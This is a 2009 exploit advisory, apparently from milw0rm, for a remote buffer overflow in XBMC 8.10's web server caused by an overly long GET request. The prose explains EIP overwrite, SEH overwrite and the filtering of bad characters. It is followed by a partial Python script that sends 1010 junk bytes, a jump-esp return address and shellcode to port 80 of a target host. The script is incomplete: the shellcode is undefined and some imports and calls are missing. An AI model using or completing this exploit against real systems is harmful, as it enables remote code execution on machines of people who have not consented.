Xbmc get request remote buffer overflow 8.10 !!!
Tested:Win xp sp2 eng
Release date:April the 1st 2009
Linux windows < tested
other versions are also possibly affected.
Restrictions:Bad chars need to be filtered.
This exploit happens when parsing and overly long
get request.We can gain control of the $eip register
the next 4bytes of our user supplied data is copied into
The 3 buffer overflows i found in xbmc have nothing in
common they are 3 separate overflow.Please see poc code
for further analysis.
I tried to evade the filtering when passing the shell code
by loading it into the other fields that where available.
We are able to overwrite the exception handlers also so
creating a reliable exploit for vista and xps3 shouldn't
be to hard have a look there are some modules loaded with
out /safe seh.
Credits to n00b for finding the buffer overflow and writing
poc code and exploit.
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
import sys, socket
port = 80
host = sys.argv
Junk_buffer = 'A'*1010
Jump_esp = struct.pack('<L',0x77F84143)
# create a socket object called 'c'
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect to the socket
Request = (Junk_buffer + Jump_esp + Shell_code)
# create a file-like object to read
fileobj = c.makefile('r', 0)
# Ask the server for the file
fileobj.write("GET /"+Request+" HTTP/1.1\n\n")
# milw0rm.com [2009-04-01]